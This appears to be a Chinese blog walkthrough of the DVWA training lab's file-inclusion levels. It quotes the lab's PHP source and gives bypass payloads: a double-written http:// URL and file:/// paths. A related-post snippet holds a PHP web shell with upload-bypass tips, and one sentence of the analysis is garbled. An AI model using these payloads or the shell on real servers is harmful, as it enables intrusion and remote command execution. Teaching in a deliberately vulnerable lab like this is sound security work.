DVWA靶场-文件包含

最新推荐文章于 2025-07-01 08:38:35 发布
原创 最新推荐文章于 2025-07-01 08:38:35 发布 · 487 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文深入解析文件包含漏洞的三种级别:低级、中级和高级,展示了如何通过HTTP协议、双写绕过和File协议等手段进行攻击。同时,文章探讨了如何通过白名单策略有效防御此类攻击。

文件包含

低级

源码:

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

低级什么也没做,直接利用http协议包含文件(可以远程包含):
在这里插入图片描述

中级

查看源代码:

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

分析:利用str_replace函数将关键字(http:// https:// …/ …\)替换成空,可防止远程包含
利用:因为虽然 做了替换但只做了一次,我们可以双写绕过或者file协议绕过

hthttp://tp://127.0.0.1/phpinfo.php

双写绕过
在这里插入图片描述
file协议绕过:
FIle协议也叫本地文件传输协议 ,主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样

file:///文件路径

在这里插入图片描述

高级

源代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

分析可知:后台将我们输入的文件file做了匹配,必须包含file,f且file做了匹配,必须包含file,f且filefileffile不等于include.php,此时服务器才不会去包含文件,两个条件只要不满足其中任意一个,就能达到文件包含的目的
绕过:file协议来绕过
FIle协议也叫本地文件传输协议 ,主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样

file:///文件路径

直接包含本地php文件
在这里插入图片描述

impossible

查看源码:

 <?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

分析:做的太绝了,对包含文件做了白名单策略,只能包含指定的那三个文件
总结:通过白名单策略可以避免文件包含

DVWA靶场File Inclusion (文件包含) 漏洞low(低),medium(中等),high(高),impossible(不可能的)所有级别通关教程及源码分析
m0_74786138的博客
12-30 949
文件包含漏洞(File Inclusion Vulnerability)是一种常见的网络安全漏洞,主要出现在应用程序中不安全地处理文件路径时。攻击者可以利用此漏洞执行恶意文件,或者访问不该被访问的文件。访问:http://127.0.0.1/DVWA/vulnerabilities/fi/?/phpinfo.php**发现没有回显,可以确定是被过滤了。要求了参数必须以file开头,即**?** ,否则就会报错。替换为了**’ '** ,可以利用双写绕过过滤。访问**file4.php,**依然可以访问。
文件包含漏洞(DVWA靶场文件包含漏洞详解)
tmzy1的博客
03-25 2402
浏览器中运行此日志文件,即可执行插入的PHP代码。注意:若是一句话代码,就可以控制此服务器了。查看日志文件已记录此条信息。1、文件包含漏洞形成原因。2、文件包含漏洞的分类。3、PHP包含日志文件。
DVWA靶场-文件包含漏洞~保姆级教程!!!
2301_77360738的博客
05-11 2994
带你手把手感受dvwa靶场File Inclusion文件包含漏洞,超详细,小白可入!!!
DVWA 靶场File Inclusion文件包含
qq_43508668的博客
04-11 287
File Upload File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 DVWA 靶场File Inclusion文件包含low二级目录三级目录 low <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going
DVWA靶场】web安全漏洞-文件上传+文件包含(详细复现教程)
weixin_60838266的博客
07-21 5529
DVWA靶场漏洞复现之文件上传+文件包含
DVWA靶场-Brute Force暴力破解
mlws1900的博客
03-12 2142
具体来说,它使用了mysqli_real_escape_string()函数对用户输入的用户名进行转义,确保特殊字符在SQL语句中不会被误解为SQL语句的一部分,从而保护数据库安全。进入暴力破解的界面,有点基础的都知道,在bp中通过字典,导入用户名和密码进行爆破,这样的操作大家见多了,再写没啥意思,想看的可以去pikachu靶场的暴力破解去了解具体操作,本文主要结合代码进行分析。3.high-高等安全等级,有安全措施保护,是中等安全等级的加深,这个等级下的安全漏洞可能不允许相同程度的攻击。
DVWA靶场--文件上传/包含(low-high).
Polaroid2的博客
10-12 739
仅用于技术分享。
网络安全 - Web 安全靶场 - DVWA-2.3.zip
10-09
DVWA包含了如Brute Force(暴力破解)、Command Injection(命令注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)等多种安全漏洞模块。这些模块不仅提供了实践的机会,还附带了详细的漏洞描述和成因分析,...
DVWA靶场-文件包含漏洞(FileInclusion)
zeroone的博客
01-16 4045
第四关:file inclusion(文件包含漏洞)       File Inclusion,文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含
DVWA靶场文件包含(File Inclusion)通关教程(high级别)
C++/C, Linux
11-30 2311
非常详细地介绍了DVWA靶场文件包含(File Inclusion)通关教程(high级别),完全零基础小白跟着做也能成功,并且配置DVWA靶场建立教程,附有图文解释
DVWA靶场-File Inclusion 文件包含
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-04 1303
往期博文: DVWA靶场-Brute Force Source 暴力破解 DVWA靶场-Command Injection 命令注入 DVWA靶场-CSRF 跨站请求伪造 靶场环境搭建 https://github.com/ethicalhack3r/DVWA [网络安全学习篇附]:DVWA 靶场搭建 目录 File Inclusion Low File Inclusion 核心代码 攻击方式 Medium File Inclusion 核心代码 本地文件包含 远程文.
PHP代码审计入门-DVWA靶场文件包含
身高两米不到的博客
11-17 888
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,文章跟随流沙前辈学习记录,看看曾经遥不可及的代码审计能不能慢慢啃下来。首先是low等级,low等级get传参没作任何限制,加之前面inlcude没作任何限制,所以存在任意文件读取和文件包含。impossible就没啥意思了,直接写死,只允许包含存在的三个文件,所以没有办法进行文件包含
DVWA靶场通关笔记-文件包含(Low级别 9种渗透方法)
最新发布
mooyuan的网络安全博客
07-01 1254
本系列为通过《DVWA靶场通关笔记》的文件包含关卡(low,medium,high,impossible共4关)渗透集合,通过对相应关卡源码的代码审计找到讲解渗透原理并进行渗透实践,本文为文件包含low关卡的渗透部分。
DVWA靶场系列(三)—— File Inclusion(文件包含
qq_45612828的博客
07-12 1312
DVWA靶场系列(三)—— File Inclusion(文件包含
web基础—dvwa靶场(四)​File Inclusion
m0_74080781的博客
09-17 1570
为了更好地使用代码的重用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码来提高重用性。但是这也产生了文件包含漏洞,产生原因是在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时用户可以对变量的值可控,而服务器端未对变量值进行合理地校验或者校验被绕过,就会导致文件包含漏洞。常用的文件包含函数有 include()、include_once()、require()、require_once()。
DVWA靶场笔记之文件包含原理
Alonegrief的博客
11-23 396
文件包含: 服务器执行php文件时,能够通过包含函数加载另一个文件中的php代码,当被包含的文件中存在木马时,也就意味着木马程序会在服务器上加载执行 在php中文件包含函数分为四个: require(),require_once(),include(),include_once() 其中require和include的区别是,require出现错误的时候,会直接报错并退出程序的执行,而include包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行。 Request_once和include_onc
DVWA靶场------File Inclusion(文件包含漏洞)
m0_65712192的博客
11-13 1952
DVWA靶场------File Inclusion(文件包含漏洞)
DVWA——文件包含
m0_74426634的博客
04-06 2543
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
DVWA 靶场通关】 File Inclusion(文件包含漏洞)
weixin_40433003的博客
04-17 1221
文件包含漏洞是 Web 应用中较为常见的漏洞之一,攻击者通过操控文件路径,访问或包含系统上的敏感文件,甚至执行恶意代码。DVWA(Damn Vulnerable Web Application)提供了一个理想的实验环境,让安全测试人员可以模拟和复现这类漏洞。本文将介绍 DVWA 中 File Inclusion 漏洞的利用原理,并分别针对Low、Medium 和 High三个安全等级,展示相应的攻击方法和防御措施。
DVWA靶场-----FIle Upload(文件上传)
06-27
DVWA(Damn Vulnerable Web Application)中,文件上传漏洞的练习是安全测试和渗透测试的重要组成部分。该漏洞通常允许攻击者上传恶意文件(如Web Shell)到服务器上,并通过特定路径访问这些文件以执行任意代码。 ### 文件上传漏洞的利用原理 DVWA中的文件上传漏洞设计是为了模拟现实世界中常见的错误配置或开发缺陷。例如: - **绕过客户端检查**:某些应用程序仅依赖JavaScript进行文件类型验证,而这种检查可以被轻易绕过。 - **服务端过滤不严格**:即使有后端验证机制,也可能存在黑名单不完整、未正确解析MIME类型或文件扩展名处理不当等问题。 - **可预测的上传路径**:攻击者可以通过猜测上传文件的路径来访问恶意文件。 ### 利用步骤 1. **准备恶意文件**:创建一个包含PHP代码的Web Shell,例如: ```php <?php if (isset($_REQUEST['cmd'])) { echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; } ?> ``` 将此代码保存为`shell.php`或其他看似合法的文件名(如`.jpg`扩展名但实际内容为PHP脚本)[^1]。 2. **上传文件**:登录DVWA并导航到文件上传模块。尝试上传准备好的文件。如果系统阻止了上传,可以通过以下方式绕过限制: - 修改文件扩展名(如`.phtml`或`.php5`)。 - 使用双扩展名(如`shell.php.jpg`)。 - 在请求中修改MIME类型为`image/jpeg`。 3. **访问上传文件**:成功上传后,通过浏览器访问上传的文件。例如,访问`http://dvwa/upload/shell.php?cmd=id`以执行命令并查看结果。 4. **进一步利用**:一旦获得远程代码执行权限,可以尝试下载更多工具(如Meterpreter)、读取敏感文件或进一步横向移动。 ### 防御措施 为了防止文件上传漏洞,开发者应采取以下措施: - **严格验证文件类型**:使用白名单验证上传文件的扩展名和MIME类型。 - **重命名上传文件**:避免用户控制文件名,随机生成文件名。 - **隔离上传目录**:将上传目录设置为不可执行脚本的区域。 - **限制文件大小**:防止资源耗尽攻击。 ### 示例代码 以下是DVWA中用于处理文件上传的简化版PHP代码片段: ```php <?php $target_dir = "uploads/"; $target_file = $target_dir . basename($_FILES["uploaded"]["name"]); $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION)); // Check if file is an image if (isset($_POST["submit"])) { $check = getimagesize($_FILES["uploaded"]["tmp_name"]); if ($check !== false) { // File is an image if (move_uploaded_file($_FILES["uploaded"]["tmp_name"], $target_file)) { echo "The file " . htmlspecialchars(basename($_FILES["uploaded"]["name"])) . " has been uploaded."; } else { echo "Sorry, there was an error uploading your file."; } } else { echo "File is not an image."; } } ?> ``` 此代码虽然检查了文件是否为图像,但由于缺乏严格的扩展名验证,仍可能被绕过。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值